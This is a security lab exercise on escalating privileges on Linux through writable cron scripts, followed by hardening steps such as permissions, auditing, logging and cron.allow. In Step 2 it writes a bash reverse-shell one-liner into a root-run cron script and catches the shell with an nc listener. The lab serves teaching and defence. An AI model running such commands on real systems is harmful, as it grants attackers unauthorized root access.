Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 37: Privilege Escalation Using Crontab Misconfigurations

by | Jul 7, 2025 | 0 comments

Objective: Exploit misconfigured crontab files to escalate privileges on a Linux system, and learn how to secure crontab configurations.

Scenario: Crontab is used to schedule tasks on Linux systems. Misconfigured crontab files, such as those with world-writable permissions or insecurely executable scripts, can be exploited to execute malicious code with elevated privileges. Your task is to identify and exploit such misconfigurations and secure crontab files to prevent unauthorized access.

Lab Setup

  1. Environment:
    • A Linux system with a user crontab and system crontab entries.
  2. Tools Required:
    • Terminal access with non-root and root privileges.

Lab Steps

Step 1: Identify Misconfigured Crontab Files

  1. List the current user’s crontab entries: crontab -l
  2. Check system-wide crontab entries: cat /etc/crontab ls -l /etc/cron.*
  3. Identify writable or insecurely configured cron jobs: find / -type f -perm -0002 -name "*cron*" 2>/dev/null

Step 2: Exploit Writable Cron Jobs

  1. Locate a writable script or command in a cron job:
    • Example crontab entry: * * * * * root /tmp/vulnerable.sh
  2. Modify the vulnerable script to include malicious code: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /tmp/vulnerable.sh chmod +x /tmp/vulnerable.sh
  3. Set up a listener on your attack machine: nc -lvnp 4444
  4. Wait for the cron job to execute and establish a reverse shell connection.

Step 3: Test Privilege Escalation

  1. Verify elevated privileges after the reverse shell connects: whoami
  2. Document the steps used to exploit the misconfiguration.

Solution

Explanation:

  • Misconfigured cron jobs with writable files allow attackers to modify scripts executed by root or other privileged users.

Prevention:

  1. Restrict File Permissions:
    • Ensure cron scripts are not writable by non-privileged users: chmod 700 /path/to/script.sh chown root:root /path/to/script.sh
  2. Audit Crontab Entries:
    • Regularly review and secure user and system crontab entries: crontab -u <username> -l cat /etc/crontab
  3. Log Cron Activity:
    • Enable cron job logging for monitoring: echo 'cron.* /var/log/cron.log' >> /etc/rsyslog.conf systemctl restart rsyslog
  4. Restrict Cron Access:
    • Use /etc/cron.allow and /etc/cron.deny to control user access. echo '<username>' > /etc/cron.allow

Testing and Verification

  1. Attempt to modify cron job scripts after applying strict permissions to confirm they are secure.
  2. Verify that unauthorized users cannot create or modify cron jobs.
  3. Monitor cron logs for suspicious activity.

Reflection

This exercise demonstrates the risks posed by misconfigured crontab files and highlights the importance of securing scheduled tasks. By identifying and mitigating these vulnerabilities, you’ve gained insights into protecting Linux systems from privilege escalation attacks.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *